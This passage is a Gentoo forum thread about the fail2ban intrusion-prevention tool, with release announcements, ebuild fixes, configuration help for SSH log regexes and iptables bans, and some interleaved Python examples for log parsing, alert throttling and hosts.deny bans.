# Fail2Ban --> SSHD, Apache, firewall and login failures

## LostControl

Hello,

I develop a small tool named fail2ban. I just do some publicity for it  :Very Happy: 

 *Quote:*   

> Fail2ban scans log files like /var/log/pwdfail and bans IP that makes too many password failures. It updates firewall rules to reject the IP address. Currently ssh, iptables, ipfwadm and ipfw are supported. Needs log4py.

 

You can find it on sourceforge.net --> http://fail2ban.sourceforge.net

Ebuilds are available here --> http://fail2ban.sourceforge.net/ebuilds

I need testing, comments, bug reports, ...  :Very Happy: 

Thank you

----------

## LostControl

Hi,

After several months of inactivity, a new release of Fail2Ban is available  :Very Happy: 

Fail2Ban can now supervise several log files and supports regular expressions. Thus you can protect your Apache authentications against brute force, or your SSH accounts, for example.

Homepage --> http://fail2ban.sourceforge.net

Ebuilds --> http://fail2ban.sourceforge.net/ebuilds

A+

----------

## LostControl

A new version is available :

 *Quote:*   

> ver. 0.3.1 (03/31/2005) - beta
> 
> ----------
> 
> - Corrected level of messages
> ...

 

Homepage --> http://fail2ban.sourceforge.net

----------

## amne

Moved from Networking & Security.

----------

## feld

Sounds like a GREAT concept. I have no CURRENT need for it, but if I was a systems admin I would LOVE to have this utility.

Keep up the good work and creating useful products for the Linux community!

-Feld

----------

## grenouille

nice!

thanks  :Very Happy: 

----------

## LostControl

Thanks for your encouragements  :Very Happy: 

And here is the first stable version of Fail2Ban:

```
ver. 0.4.0 (04/24/2005) - stable
----------
- Fixed textToDNS which did not recognize strings like
  "12-345-67-890.abcd.mnopqr.xyz"
```

There is only one bug fix since 0.3.1. Do not hesitate to test it  :Wink: 

Homepage: http://fail2ban.sourceforge.net

----------

## freelight

Looks very nice, I think I'll be making use of this on a server I run.

Have you tried getting this added to Portage (submit the ebuild to the Gentoo bugzilla)?

----------

## LostControl

 *freelight wrote:*   

> Looks very nice, I think I'll be making use of this on a server I run.
> 
> Have you tried getting this added to Portage (submit the ebuild to the Gentoo bugzilla)?

 

Not yet! I wanted to have a "stable" version first. It seems that it is time to file a bug report  :Wink: 

If you test it, I would really appreciate your feedback.

Thank you

----------

## grenouille

this should be in the official portage tree tbh  :Very Happy: 

----------

## LostControl

 *grenouille wrote:*   

> this should be in the official portage tree tbh 

 

I've filed a bug report, so... wait and see  :Wink: 

----------

## christsong84

looks real useful for me too...I think I'm going to use it...I'll let ya know if I find any problems ^_^

----------

## LostControl

Version 0.4.1 is available  :Very Happy: 

Just a small bug fix and modifications of the configuration file for readability. An initd script for Gentoo is now available.

A+

----------

## prymitive

2 errors in the 0.4.1 ebuild:

```
instinto /etc
```

should be

```
insinto /etc
```

Also, the /etc/init.d/fail2ban script must be executable, but after emerge it isn't.

Great tool, it bans a lot  :Wink: 

----------

## LostControl

 *prymitive wrote:*   

> 2 errors in 0.4.1 ebuild:
> 
> instinto /etc
> 
> should be 
> ...

 

Many thanks  :Very Happy: 

Now, the ebuild should be correct!

----------

## LostControl

Hi,

A new version of Fail2Ban is available. Lots of new features are included.

```
ver. 0.5.0 (2005/07/12) - beta
----------
- Added support for CIDR mask in ignoreip
- Added mail notification support
- Fixed bug #1234699
- Added tags replacement in rules definition. Should allow a
  clean solution for Feature Request #1229479
- Removed "interface" and "firewall" options
- Added start and end commands in the configuration file.
  Thanks to Yaroslav Halchenko
- Added firewall rules definition in the configuration file
- Cleaned fail2ban.py
- Added an initd script for RedHat/Fedora. Thanks to Andrey
  G. Grozin
```

Please test this version and report any bugs in order to make it stable as soon as possible.

Homepage: http://fail2ban.sourceforge.net

Ebuilds: http://fail2ban.sourceforge.net/ebuilds

Thank you

----------

## quat

this tool is great. finally i have peace and quiet on my box  :Very Happy: 

However, is it possible to ban a person who tries to find the root password? I.e. in the logs I sometimes have, even more than 500 times:

```
Jul 15 11:10:28 solid sshd[11251]: User root not allowed because not listed in AllowUsers
```

I disabled the root access through ssh but still I'm wondering, is it possible to ban such ip ?

many thanx,

quat

----------

## LostControl

 *quat wrote:*   

> However, is it possible to ban a person who tries to find the root password? I.e. in the logs I sometimes have, even more than 500 times:
> 
> ```
>  Jul 15 11:10:28 solid sshd[11251]: User root not allowed because not listed in AllowUsers
> ```
> ...

 

If there is no IP address in the log message, fail2ban won't be able to ban it  :Wink:  But in my logs I get things like:

```
Jul 15 12:38:33 [sshd] User root not allowed because not listed in AllowUsers
Jul 15 12:38:33 [sshd] Failed password for invalid user root from 61.75.4.142 port 42549 ssh2
```

So this login attempt should be detected by fail2ban. Thus root logins are detected as any other login attempts and should be banned.

----------

## quat

i didn't have such entries in log, but I changed the log level in sshd and now finally such ips can be logged and banned.

thanx for help,

quat

----------

## cyan051

nice little software, but a major P.I.T.A. with the timeregex and timepattern settings...

this would be from my ssh log:

```
2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Invalid user qwerty from 192.168.1.10
2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Failed none for invalid user qwerty from 192.168.1.10 port 56433 ssh2
2005/08/29 21:21:51; 21; src@helios.next; auth; alert; sshd(pam_unix)[21337]: check pass; user unknown
2005/08/29 21:21:51; 25; src@helios.next; auth; notice; sshd(pam_unix)[21337]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=notepad.next
```

as you can see, my logger (syslog-ng) uses this format:

```
template("$YEAR/$MONTH/$DAY $HOUR:$MIN:$SEC; $TAG; $FULLHOST; $FACILITY; $PRIORITY; $MESSAGE\n")
```

so, how do i set up properly timeregex and timepattern in fail2ban?

i've tried

```
timeregex = \d{4}\/\d{2}\/d{2} \d{2}:\d{2}:\d{2}
timepattern = %%Y\/%%m\/%%d %%H:%%M:%%S
```

and couple of other mutations, but nothing worked...

----------

## LostControl

Hi,

Thanks for using Fail2Ban  :Wink: 

Here are the correct regexps:

```
timeregex = \d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}
timepattern = %%Y/%%m/%%d %%H:%%M:%%S
```

And be aware that 192.168.0.0/16 is ignored by default. You can change this in fail2ban.conf (ignoreip).

A+

----------

## cyan051

great...thnx...

one wish: mail notification should include more detailed input

- which policy was violated (if there is more than one active policy - apache, ssh, etc.)

- for which user it was violated (seen in ssh logs)

otherwise, a great tool...

----------

## alinv

One more thing about mail alerts: they all appear to be sent on 01.01.1970.

----------

## cyan051

that sounds a bit strange...

on my system it definitely shows the right time stamp...

----------

## alinv

The latest version fixed this. I was still using 0.5.2. My bad

BTW, fail2ban should definitely go into portage.

----------

## alinv

Another problem:

If I rebuild my firewall rules w/o restarting fail2ban, I still get alert mails about an ip being banned, but fail2ban.log says another thing:

```
2005-10-10 22:30:00,627 WARNING: Ban 82.76.34.117
2005-10-10 22:30:00,642 ERROR: 'iptables -I fail2ban-ssh 1 -s '82.76.34.117' -j DROP' returned 256
```

IMO, fail2ban should either test the existence of the fail2ban-ssh chain and re-create it, or it should send an error message.

----------

## LostControl

Thank you,

Many people complain about this. We will improve this before 0.6, which should appear soon  :Very Happy: 

Stop fail2ban before iptables and start it after iptables to avoid the problem. Some firewall scripts also flush iptables rules in order to recreate them. You will also need to restart fail2ban in this case.

A+

----------

## Tanisete

I'm trying your tool in my system, but i don't understand something:

```
2005-10-22 12:43:41,582 WARNING: Restoring firewall rules...
2005-10-22 12:43:41,594 ERROR: 'iptables -D INPUT -p tcp --dport http -j fail2ban-http
iptables -D fail2ban-http -j RETURN
iptables -X fail2ban-http' returned 256
2005-10-22 12:43:41,606 ERROR: 'iptables -D INPUT -p tcp --dport ssh -j fail2ban-ssh
iptables -D fail2ban-ssh -j RETURN
iptables -X fail2ban-ssh' returned 256
2005-10-22 12:43:41,607 INFO: Exiting...
2005-10-22 12:43:42,803 INFO: Fail2Ban v0.5.4 is running
2005-10-22 13:40:40,741 WARNING: Restoring firewall rules...
2005-10-22 13:40:40,764 INFO: Exiting...
2005-10-22 13:40:41,961 INFO: Fail2Ban v0.5.4 is running
```

Is this the same it was commented before in the thread?

Thanks for developing it!

----------

## LostControl

 *Tanisete wrote:*   

> Is this the same it was commented before in the thread?

 

Yes, probably  :Confused:  I'm sorry, Fail2ban 0.6 is not out yet  :Sad:  I'm a bit busy these days and I don't have a lot of time to fix bugs.

 *Tanisete wrote:*   

> Thanks for developing it!

 

Thank you for using it  :Wink: 

----------

## Tanisete

Ok, thanks for answering! No problem, it's working fine here... 30 banned ip up to now  :Smile: 

----------

## LostControl

Hi,

A new testing version is out  :Very Happy:  You can download an ebuild for 0.5.5 from here.

The problem with missing chains (firewall rules flushed by other software) should be fixed (reinitialization of the Fail2ban chains and restoration of the rules). Thanks to Yaroslav Halchenko (Debian maintainer), who did a lot for this release.

A+

----------

## OneInchMen

Isn't it about time to get this added to the main portage tree? I'm using fail2ban for over a month now and it really helps to cut down the attacks on port 22 (ssh), no problems here...

Even if you think fail2ban isn't stable enough, get it in the tree masked and/or unstable. I'll be glad to add it to portage.unmask and .keywords...

----------

## alinv

 *OneInchMen wrote:*   

> Isn't it about time to get this added to the main portage tree? I'm using fail2ban for over a month now and it really helps to cut down the attacks on port 22 (ssh), no problems here...
> 
> Even if you think fail2ban isn't stable enough, get it in the tree masked and/or unstable. I'll be glad to add it to portage.unmask and .keywords...

 

I strongly agree.

----------

## LostControl

I already filed a bug report more than 6 months ago --> https://bugs.gentoo.org/show_bug.cgi?id=90339

Fail2ban is still looking for a maintainer  :Sad:  It is already in Debian unstable.

I was waiting for the next stable version to bump the Gentoo bugzilla report. You can add yourself to the CC list. You will be notified of the latest news about Fail2ban in Portage, and devs will see that people are waiting for it  :Very Happy: 

Thank you guys for using this free software  :Wink: 

----------

## ercete

Great job !

I have been using it for a few weeks and it works very well.

I'm just searching for a simple command for unbanning an IP according to fail2ban.

Is it possible?

----------

## alinv

Have a look at the fwunban command in fail2ban.conf, it's self-explanatory.

----------

## ercete

Excellent, thank you !

As an alias in .bashrc it's great  :Wink: 

----------

## Tanisete

Another stupid question: in ssh I also want to ban people who try a user that is not listed in allowusers. Is it enough to have this in fail2ban.conf?

```
failregex = authentication failure|Failed password|not allowed because not listed in AllowUsers
```

Thanks a lot! 0.5.5 working here without problems

----------

## LostControl

 *Tanisete wrote:*   

> Another stupid question: in ssh I also want to ban people who try a user that is not listed in allowusers. Is it enough to have this in fail2ban.conf?
> 
> ```
> failregex = authentication failure|Failed password|not allowed because not listed in AllowUsers
> ```
> ...

 

Mmmhhh... OpenSSH also generates a "Failed password" if someone not listed in AllowUsers tries to log in. Thus, it should not be needed to add a match on "not allowed because not listed in AllowUsers".

```
Nov  6 16:17:07 [sshd] User root from qz150.internetdsl.tpnet.pl not allowed because not listed in AllowUsers
Nov  6 16:17:07 [sshd] error: Could not get shadow information for NOUSER
Nov  6 16:17:07 [sshd] Failed password for invalid user root from 80.55.51.150 port 2363 ssh2
```

I will release 0.6 soon. Thanks for reporting a success story  :Very Happy: 

----------

## Tanisete

Hum, that's not my case. Is it enough to change LogLevel to VERBOSE?

Thanks!!

----------

## c4

Got this running on one of my servers now, thank you for such a great tool!

Working excellent for my purposes.   :Very Happy: 

----------

## newtonian

Hi-

I'm new to ebuilds and I'm not sure if I installed this correctly.  Let me know if I did something wrong.

I used this page as a reference:

http://gentoo-wiki.com/HOWTO_Installing_3rd_Party_Ebuilds

Get the ebuild:

```
cd /tmp
mkdir fail2ban
cd fail2ban
wget http://fail2ban.sourceforge.net/ebuilds/fail2ban-0.5.5.ebuild
```

Looked at the current portage layout:

```
ls /usr/portage/
```

```
mkdir -p /usr/local/portage/net-misc/fail2ban
cp fail2ban-0.5.5.ebuild /usr/local/portage/net-misc/fail2ban/
```

Make sure you have this line in your /etc/make.conf; if not, add it:

 *Quote:*   

> PORTDIR_OVERLAY="/usr/local/portage"

Finish the install:

```
ebuild /usr/local/portage/net-misc/fail2ban/fail2ban-0.5.5.ebuild digest
echo "net-misc/fail2ban ~x86" >> /etc/portage/package.keywords
emerge fail2ban
```

Configure and Start:

```
vim /etc/fail2ban.conf
/etc/init.d/fail2ban start
rc-update add fail2ban default
```

It seemed to emerge fine. I'm just wondering if this is what everybody else does when they install fail2ban. If this is correct, hopefully it will help out people new to Gentoo and/or 3rd party ebuilds who want to install fail2ban.

Cheers,

Last edited by newtonian on Wed Nov 16, 2005 9:22 pm; edited 1 time in total

----------

## c4

Looks great newtonian

I put fail2ban in /usr/local/portage/net-firewall/  but the principle is just the same.

If fail2ban is added to the official portage tree some day then one might have to adjust the paths in the local portage as well, or else specify to emerge dir/fail2ban to tell them apart. (For example, compare the current situation with dev-php/php and dev-lang/php.)

----------

## newtonian

 *c4 wrote:*   

> Looks great newtonian
> 
> I put fail2ban in /usr/local/portage/net-firewall/  but the principle is just the same.
> 
> If fail2ban is added to the official portage tree some day then one might have to adjust the paths in the local portage as well, or else specify to emerge dir/fail2ban to tell them apart. (For example, compare the current situation with dev-php/php and dev-lang/php.)

 

Thanks, I wanted to install this on several machines and didn't want to find out I was doing it wrong halfway through the process.

Thanks,  :Wink: 

----------

## namo

Hello,

I have just started using your program and I must say I'm really pleased with it, so thank you !   :Very Happy: 

I changed the default match for sshd because it would sometimes be triggered twice (but I have only done a few tests). It is also watching squirrelmail and pure-ftpd.

Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting.

And a thought just crossed my mind: can the same log file be watched by two separate modules or should it be split? I think I'll try to figure it out for myself anyway.

namo

----------

## LostControl

Hi,

 *namo wrote:*   

> I have just started using your program and I must say I'm really pleased with it, so thank you !  

 

Thank you  :Wink: 

 *namo wrote:*   

> It is also watching squirrelmail and pure-ftpd.

 

Could you share your configuration sections? I could include them into the default configuration file with your agreement.

 *namo wrote:*   

> Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting.

 

Just add a "maxfailures" field in the section to override the default setting  :Wink: 

 *namo wrote:*   

> And a thought just crossed my mind: can the same log file be watched by two separate modules or should it be split? I think I'll try to figure it out for myself anyway.

 

I never tried this  :Confused:  However, it should make no difference and work as expected  :Very Happy: 

A+

----------

## Vanquirius

fail2ban is now in Portage as net-analyzer/fail2ban.

Cheers!

----------

## newtonian

 *Vanquirius wrote:*   

> fail2ban is now in Portage as net-analyzer/fail2ban.
> 
> Cheers!

 

Cool-

So to install fail2ban now, all you have to do is:

```
ACCEPT_KEYWORDS="~x86" emerge fail2ban
```

tweak

```
vim /etc/fail2ban.conf
/etc/init.d/fail2ban start
rc-update add fail2ban default
```

and enjoy   :Smile: 

Cheers,

----------

## LostControl

 *Vanquirius wrote:*   

> fail2ban is now in Portage as net-analyzer/fail2ban.
> 
> Cheers!

 

Thank you very much  :Very Happy: 

----------

## federico

I am not able to make fail2ban work...

I am trying in my LAN, and I enabled banning of the LAN.

I have the ssh log set to verbose and fail2ban reads /var/log/sshd.log

As I use syslog-ng I've set these lines

```
timeregex = \d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}
timepattern = %%Y/%%m/%%d %%H:%%M:%%S
```

and decreased the number of failures to 3, but fail2ban never bans anyone...

```
2005-11-21 16:27:01,334 DEBUG: [logreader.py (103)] /var/log/sshd.log has been modified
2005-11-21 16:27:01,335 DEBUG: [logreader.py (134)] /var/log/sshd.log
2005-11-21 16:27:01,336 DEBUG: [logreader.py (122)] Setting file position to 2981L for /var/log/sshd.log
2005-11-21 16:27:03,342 DEBUG: [logreader.py (103)] /var/log/sshd.log has been modified
2005-11-21 16:27:03,343 DEBUG: [logreader.py (134)] /var/log/sshd.log
2005-11-21 16:27:03,345 DEBUG: [logreader.py (122)] Setting file position to 3115L for /var/log/sshd.log
```

Do I have wrong settings?

Federico

EDIT

My lines about ssh logs:

```
Nov 21 16:16:27 sideralis sshd[12665]: Connection from 192.168.15.5 port 37189
Nov 21 16:16:28 sideralis sshd(pam_unix)[12667]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=altair  user=root
Nov 21 16:16:30 sideralis sshd[12665]: error: PAM: Authentication failure for root from altair
Nov 21 16:16:30 sideralis sshd[12665]: Failed keyboard-interactive/pam for root from 192.168.15.5 port 37189 ssh2
Nov 21 16:16:30 sideralis sshd(pam_unix)[12669]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=altair  user=root
```

----------

## LostControl

Hi,

Look at your SSH logs and your timeregex/timepattern. They do not correspond  :Wink:  Try the default settings:

```
# Option:  timeregex
# Notes.:  regex to match timestamp in SSH logfile.
# Values:  [Mar  7 17:53:28]
# Default: \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}
#
timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}

# Option:  timepattern
# Notes.:  format used in "timeregex" fields definition. Note that '%' must be
#          escaped with '%' (see http://rgruet.free.fr/PQR2.3.html#timeModule)
# Values:  TEXT  Default:  %%b %%d %%H:%%M:%%S
#
timepattern = %%b %%d %%H:%%M:%%S
```

You should also change your "failregex" to:

```
failregex = Failed keyboard-interactive
```

A+
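As an added example (not fail2ban's own code, nor any poster's) tying together the questions above: cyan051's syslog-ng timeregex/timepattern, federico's timestamp mismatch, quat's AllowUsers line without an address, ignoreip with a CIDR mask and a per-section maxfailures. It assumes the conf is read with Python's configparser (which is why `%` has to be doubled); the IP regex, section names and all log lines are constructed, with addresses from the documentation ranges.

```python
import configparser
import ipaddress
import re
import time
from collections import Counter

# Constructed fail2ban.conf fragment. [DEFAULT] carries the stock syslog timestamp
# settings; [SSH-syslogng] overrides them with cyan051's syslog-ng layout and its
# own maxfailures. '%%' is what configparser's interpolation needs to yield '%'.
CONF = r"""
[DEFAULT]
ignoreip = 127.0.0.1 192.168.0.0/16
maxfailures = 3
timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}
timepattern = %%b %%d %%H:%%M:%%S

[SSH]
failregex = authentication failure|Failed password|Failed keyboard-interactive|not allowed because not listed in AllowUsers

[SSH-syslogng]
timeregex = \d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}
timepattern = %%Y/%%m/%%d %%H:%%M:%%S
failregex = Failed none for invalid user|Failed password
maxfailures = 2
"""

# A dotted quad not embedded in a longer number (constructed; not fail2ban's regex).
IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Constructed log lines in the two layouts seen in the thread. 198.51.100.7 is the
# attacker, 192.168.1.10 falls under ignoreip, the AllowUsers line has no address.
SYSLOG_LINES = [
    "Jul 15 12:38:33 [sshd] User root not allowed because not listed in AllowUsers",
    "Jul 15 12:38:33 [sshd] Failed password for invalid user root from 198.51.100.7 port 42549 ssh2",
    "Jul 15 12:38:41 [sshd] Failed password for invalid user admin from 198.51.100.7 port 42550 ssh2",
    "Jul 15 12:38:47 [sshd] Failed password for root from 192.168.1.10 port 51000 ssh2",
    "Jul 15 12:38:52 [sshd] Failed password for invalid user test from 198.51.100.7 port 42551 ssh2",
    "Nov  6 16:17:07 [sshd] Failed keyboard-interactive/pam for root from 203.0.113.9 port 37189 ssh2",
]
SYSLOGNG_LINES = [
    "2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Invalid user qwerty from 198.51.100.7",
    "2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Failed none for invalid user qwerty from 198.51.100.7 port 56433 ssh2",
    "2005/08/29 21:22:03; 26; src@helios.next; auth; info; sshd[21340]: Failed password for invalid user qwerty from 198.51.100.7 port 56434 ssh2",
]


def load_conf(text=CONF):
    """Parse the config; BasicInterpolation turns '%%b' into '%b' on read."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return cp


def parse_line(line, timeregex, timepattern, failregex):
    """Return (struct_time, ip) for a bannable failure line, else None."""
    ts = re.search(timeregex, line)
    if ts is None:
        return None  # timestamp layout does not match: the whole line is invisible
    if re.search(failregex, line) is None:
        return None  # not a failure
    ip = IP_RE.search(line)
    if ip is None:
        return None  # a failure without an address: nothing to ban
    return time.strptime(ts.group(0), timepattern), ip.group(0)


def visible_lines(lines, timeregex):
    """How many lines the timestamp regex recognises at all (0 means: fix timeregex first)."""
    return sum(1 for line in lines if re.search(timeregex, line))


def scan(lines, section):
    """Count failures per IP for one config section and return (failures, banned)."""
    ignore = [ipaddress.ip_network(n) for n in section["ignoreip"].split()]
    limit = section.getint("maxfailures")
    failures, banned = Counter(), []
    for line in lines:
        hit = parse_line(line, section["timeregex"], section["timepattern"],
                         section["failregex"])
        if hit is None:
            continue
        _, ip = hit
        if any(ipaddress.ip_address(ip) in net for net in ignore):
            continue  # ignoreip honours CIDR masks (added in 0.5.0)
        failures[ip] += 1
        if failures[ip] == limit:
            banned.append(ip)
    return failures, banned


if __name__ == "__main__":
    cp = load_conf()
    print(scan(SYSLOG_LINES, cp["SSH"]))
    print(scan(SYSLOGNG_LINES, cp["SSH-syslogng"]))
    # cyan051's first attempt (a backslash short) recognises no line at all:
    print(visible_lines(SYSLOGNG_LINES, r"\d{4}\/\d{2}\/d{2} \d{2}:\d{2}:\d{2}"))
```

Swap in your own log lines and conf fragment to see which of the three checks (timestamp, failregex, address) drops a line before touching the firewall.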

----------

## federico

Nice tip, now it seems to work:

```
2005-11-22 00:42:06,904 DEBUG: [logreader.py (151)] Found 192.168.15.5
2005-11-22 00:42:06,907 INFO: [fail2ban.py (477)] SSH: 192.168.15.5 has 3 login failure(s). Banned.
2005-11-22 00:42:06,908 WARNING: [firewall.py (89)] SSH: Ban 192.168.15.5
2005-11-22 00:42:06,909 DEBUG: [process.py (129)] iptables -L INPUT | grep -q fail2ban-ssh
2005-11-22 00:42:06,910 DEBUG: [process.py (129)] iptables -I fail2ban-ssh 1 -s '192.168.15.5' -j DROP
```

But I still have a problem: iptables does not work. Fail2ban logs iptables commands but my iptables configuration does not change, as far as I can see; also, when fail2ban starts I have no new rules in my iptables.

What could I do, or search for?

Federico

PS: I hope to make this working because it's too nice !

----------

## namo

 *LostControl wrote:*   

>  *namo wrote:*   It is also watching squirrelmail and pure-ftpd. 
> 
> Could you share your configuration sections? I could include them into the default configuration file with your agreement.

 

Well, I don't really follow the default way of using an iptables chain per module, so I'll just mention that the string to match is :

```
failregex = Authentication failed
```

Of course, if you have something like that for your logfile :

```
logfile = /var/log/ftpd.log
```

you have to tell syslog-ng to separate your ftp logs (by default pure-ftpd logs to the ftp facility) :

```
destination     ftpd            { file("/var/log/ftpd.log"); };
filter          f_ftpd          { facility(ftp); };
log { source(src); filter(f_ftpd); destination(ftpd); };
```

The time regex is the same.

For squirrelmail, it's a bit more complicated: you have to install the squirrel_logger plugin (http://www.squeaksoft.com/products/SquirrelLogger/), edit one php file to add a hook for failed logins (it's in the plugin's README), choose a file to log to and turn the plugin on (with the usual conf.pl script).

Then the fail2ban part :

```
failregex = Failed webmail login
```

with the same time regex

 *LostControl wrote:*   

>  *namo wrote:*   Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting. 
> 
> Just add a "maxfailures" field in the section to override the default setting  

 

Well, that was fast !   :Very Happy: 

 *LostControl wrote:*   

>  *namo wrote:*   And a thought just crossed my mind : can the same log file be watched by two separate modules or should it to be split ? I think I'll try to figure for myself anyway. 
> 
> I never try this  However, it should make no difference and work as expected  

 

I still haven't tried what I had in mind for this...

----------

## LostControl

 *federico wrote:*   

> But I still have a problem: iptables does not work. Fail2ban logs iptables commands but my iptables configuration does not change, as far as I can see; also, when fail2ban starts I have no new rules in my iptables.
> 
> What could I do, or search for?
> 
> Federico
> ...

 

Just remove the command line option "-d" and/or set "debug = false". Debug mode DOES NOT EXECUTE commands but just prints them in the log.

I will change this feature in the next development branch. You are not the first to report this "problem". If you want to have more verbosity, use "-vv".

Fail2ban should work now  :Very Happy: 

----------

## LostControl

 *namo wrote:*   

> Well, I don't really follow the default way of using an iptables chain per module, so I'll just mention that the string to match is :
> 
> ```
> failregex = Authentication failed
> ```
> ...

 

Thank you  :Very Happy:  Will be added in a future release.

----------

## federico

 *LostControl wrote:*   

> Just remove the command line option "-d" and/or set "debug = false". Debug mode DOES NOT EXECUTE commands but just prints them in the log.
> 
> I will change this feature in the next development branch. You are not the first to report this "problem". If you want to have more verbosity, use "-vv".
> 
> Fail2ban should work now 

 

It works  :Smile: 

It was not clear, that thing about -d; I thought that debugging was sort of seeing a lot of strings printed on my shell  :Smile: 

I hope now to find a lot of banned ip   :Twisted Evil:   :Twisted Evil: 

If it works well I think I am going to put it on all my servers ^_^

Federico

----------

## namo

Another idea I had : I think it would be better to rate-limit the email fail2ban sends. Something like :

```
if (too_many_failures) {
  [...]
  # send an alert
  if (now() - last_mail_timestamp > configurable_time) {
     last_mail_timestamp = now();
     send_the_alert();
  }
}
```

This raises the issue of "lost" alerts: so either you'd have to 1) buffer the events and send them in blocks or 2) tell the user from the start that if he sets configurable_time he might lose some alerts and so should check his logs for a full report. 1) is more complicated to implement and begins to make fail2ban be tenshi-like; 2) should be simple and, despite the possible lost alerts (which shouldn't be too many, I would set configurable_time to about 10s), I still prefer it to an unchecked flow of emails (I am not sure a DoS could be possible but I prefer not to take chances...).

I only checked the code superficially, so if some functionality like that is already present, just ignore me   :Wink: 

I'd send you a patch but I need to learn Python and your code !   :Embarassed: 

edit: if you want to take this outside the forum, tell me ! (I'm French btw)
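As an added example (my own code, not namo's pseudocode or anything in fail2ban), the rate-limiting idea above worked through with both of the options it discusses: "drop" loses the alerts inside the window and only counts them, "batch" queues them and mails them as one block once the window has passed. The `send` callable, the injectable clock and the 50-ban burst are constructed for the demonstration.

```python
import time


class AlertThrottle:
    """At most one notification per `interval` seconds.

    mode="drop"  is option 2 from the post: alerts inside the window are counted
                 and lost; the log file remains the full record.
    mode="batch" is option 1: alerts inside the window are queued and delivered
                 as one block by the next tick() after the window has passed.
    `send` is whatever delivers the mail (a list.append stand-in below);
    `clock` is injectable so a burst can be simulated without sleeping.
    """

    def __init__(self, interval, send, mode="batch", clock=time.monotonic):
        self.interval = interval
        self.send = send
        self.mode = mode
        self.clock = clock
        self.last_mail_timestamp = float("-inf")  # nothing mailed yet
        self.pending = []
        self.dropped = 0

    def _window_passed(self, now):
        return now - self.last_mail_timestamp > self.interval

    def alert(self, event):
        """Called for every ban; returns what happened to this event."""
        now = self.clock()
        if self._window_passed(now):
            batch, self.pending = self.pending + [event], []
            self.last_mail_timestamp = now
            self.send(batch)
            return "sent"
        if self.mode == "batch":
            self.pending.append(event)
            return "queued"
        self.dropped += 1
        return "dropped"

    def tick(self):
        """Call from the main loop; flushes a queued batch once the window has passed."""
        now = self.clock()
        if self.pending and self._window_passed(now):
            batch, self.pending = self.pending, []
            self.last_mail_timestamp = now
            self.send(batch)
            return len(batch)
        return 0


class FakeClock:
    """Deterministic stand-in for time.monotonic()."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate(mode, bans=50, interval=10.0):
    """Constructed scenario: `bans` bans within one second, then silence.
    Returns (mails, dropped); mails is the list of batches handed to send()."""
    clock, mails = FakeClock(), []
    throttle = AlertThrottle(interval, mails.append, mode, clock)
    for i in range(bans):
        throttle.alert(f"Ban 198.51.100.{i + 1}")  # constructed addresses
        clock.advance(1.0 / bans)
        throttle.tick()  # fail2ban's loop polls the logs about once a second anyway
    clock.advance(interval + 1)
    throttle.tick()
    return mails, throttle.dropped


if __name__ == "__main__":
    for mode in ("drop", "batch"):
        mails, dropped = simulate(mode)
        print(mode, "mails:", [len(m) for m in mails], "dropped:", dropped)
```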

----------

## OneInchMen

Is anybody using fail2ban in combination with PeerGuardian? [ebuild]

Since installing PG, Fail2ban fails to ban IPs, resulting in hundreds of emails and no actions taken... PG does work fine, since one of the 2 proxies at my work is on a blacklist and gets blocked by my homeserver.

----------

## kojiro

I got fail2ban working without iptables. Just hosts.deny. It required some hackery, but for your amusement:

```
[SSH]
enabled = true
logfile = /var/log/sshd/current
fwstart =
fwend   =
fwcheck =
fwban   = IP=<ip> && echo "ALL: $IP" >> /etc/hosts.deny
fwunban = IP=<ip> && sed -i.old s/ALL:\ $IP// /etc/hosts.deny
timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}
timepattern = %%b %%d %%H:%%M:%%S
failregex = Authentication failure|Failed password|Invalid user
```

This was just quick-and-dirty, but it works. I'm definitely still working on making those fw(un)ban commands prettier/more useful, and since hosts.deny supports protocol-specific denials, I'm sure I could make this even smarter if I did anything other than ssh. But it's a good proof-of-concept. Who needs iptables?  :Wink: 
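As an added example (my own code, not kojiro's configuration or anything shipped with fail2ban), the hosts.deny ban/unban pair redone as a small Python script that fail2ban could call from `fwban`/`fwunban`: unbanning compares whole lines, so it leaves no blank line behind and cannot strip an entry for a longer address that merely contains the unbanned one (10.0.0.1 versus 10.0.0.10), and every write goes through a temporary file and rename. The script name, the scratch-file helper and the addresses are constructed.

```python
import ipaddress
import os
import sys
import tempfile

HOSTS_DENY = "/etc/hosts.deny"


def entry_for(ip):
    """The hosts.deny line for one address; rejects anything that is not an IP."""
    ipaddress.ip_address(ip)  # raises ValueError on garbage from a bad <ip> tag
    return f"ALL: {ip}"


def read_entries(path):
    try:
        with open(path) as fh:
            return fh.read().splitlines()
    except FileNotFoundError:
        return []


def write_entries(path, lines):
    """Write a temp file next to the target and rename it into place, so tcpd
    never reads a half-written hosts.deny."""
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".", prefix=".hosts.deny.")
    with os.fdopen(fd, "w") as fh:
        fh.write("".join(line + "\n" for line in lines))
    os.chmod(tmp, 0o644)
    os.replace(tmp, path)


def ban(ip, path=HOSTS_DENY):
    """Append 'ALL: <ip>' once; a repeated ban is a no-op. Returns the new contents."""
    lines = read_entries(path)
    entry = entry_for(ip)
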